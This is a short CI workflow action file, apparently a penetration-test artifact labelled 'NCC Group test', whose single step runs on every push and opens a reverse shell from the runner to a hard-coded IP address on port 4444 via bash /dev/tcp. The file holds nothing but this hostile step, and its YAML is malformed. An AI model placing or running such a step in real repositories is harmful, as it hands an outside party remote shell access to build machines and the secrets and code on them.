name:NciciActionPT
description: 'NCC Group test'
on: push
runs: 
	using: "composite"
	steps:
		-name: Thor interactive shell
		 shell: bash
		 run: |
				      /bin/bash -c "exec 3<>/dev/tcp/195.95.131.112/4444; cat <&3 & cat >&3;"
